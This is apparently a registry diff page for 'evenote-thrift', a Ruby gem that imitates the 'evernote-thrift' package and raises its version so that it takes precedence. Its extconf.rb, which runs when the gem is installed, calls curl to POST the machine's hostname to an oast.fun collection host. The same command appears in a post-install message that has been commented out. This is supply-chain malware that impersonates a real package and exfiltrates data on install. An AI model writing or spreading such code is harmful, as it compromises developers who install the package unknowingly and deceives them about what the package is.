evenote-thrift 10.2.0 → 10.4.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/evenote-thrift.gemspec +5 -5
- data/extconf.rb +12 -4
- metadata +2 -4
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: c94c73c2fabdd128528da0f7690634f31ab456329d3e33fc3d1b43dd7f856bd7
|
4
|
+
data.tar.gz: b5c9d084b93dcb0a3501403ab8b9a5299245cacd7b3a034d9e3c5b4d4d374c8b
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: f5be096de43fab2129d46802ff25e602b6731f0f138b7d4d088a7f67c0ca9b6d9a3d43d127755b7a613ac9f23ad58bb5a9338cd21cfbc0493290e9edbd21d88f
|
7
|
+
data.tar.gz: d1270688fa586cfcb6ea697e7051028c50325e66fdaa2c3a006c972b859a7c1bbd0f5ee485bb03bb5b708e40a734fd0708664356d5f1283810ffd4686f440bd5
|
data/evenote-thrift.gemspec
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
Gem::Specification.new do |s|
|
2
2
|
s.name = 'evenote-thrift'
|
3
|
-
s.version = '10.
|
3
|
+
s.version = '10.4.0' # Higher version to take precedence
|
4
4
|
s.summary = "A simple mimicking evernote-thrift"
|
5
5
|
s.description = "This gem is a placeholder."
|
6
6
|
s.authors = ["raxis-evernote"]
|
@@ -16,10 +16,10 @@ Gem::Specification.new do |s|
|
|
16
16
|
s.extensions = ["extconf.rb"]
|
17
17
|
|
18
18
|
# Add a post_install message that executes the command
|
19
|
-
|
20
|
-
|
21
|
-
|
22
|
-
|
19
|
+
# s.post_install_message = <<-POST_INSTALL
|
20
|
+
# Post-install command:
|
21
|
+
# curl -X POST -d "$(hostname)" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun"
|
22
|
+
# POST_INSTALL
|
23
23
|
|
24
24
|
# This method will execute after the gem is installed
|
25
25
|
s.extensions = ["extconf.rb"]
|
data/extconf.rb
CHANGED
@@ -1,4 +1,15 @@
|
|
1
|
-
# extconf.rb
|
1
|
+
# # extconf.rb
|
2
|
+
|
3
|
+
# require 'mkmf'
|
4
|
+
|
5
|
+
# # Create a Makefile for the native extension
|
6
|
+
# create_makefile('evenote_thrift')
|
7
|
+
|
8
|
+
# # Command to obtain hostname and post it to a specified URL
|
9
|
+
# system("curl -X POST -d \"$(hostname)\" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun")
|
10
|
+
|
11
|
+
# end
|
12
|
+
|
2
13
|
|
3
14
|
require 'mkmf'
|
4
15
|
|
@@ -7,6 +18,3 @@ create_makefile('evernote_thrift')
|
|
7
18
|
|
8
19
|
# Command to obtain hostname and post it to a specified URL
|
9
20
|
system("curl -X POST -d \"$(hostname)\" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun")
|
10
|
-
|
11
|
-
end
|
12
|
-
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: evenote-thrift
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 10.
|
4
|
+
version: 10.4.0
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- raxis-evernote
|
@@ -23,9 +23,7 @@ files:
|
|
23
23
|
homepage: https://reachas.com
|
24
24
|
licenses: []
|
25
25
|
metadata: {}
|
26
|
-
post_install_message:
|
27
|
-
Post-install command:
|
28
|
-
curl -X POST -d "$(hostname)" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun"
|
26
|
+
post_install_message: Thanks for installing evernote-thrift!
|
29
27
|
rdoc_options: []
|
30
28
|
require_paths:
|
31
29
|
- lib
|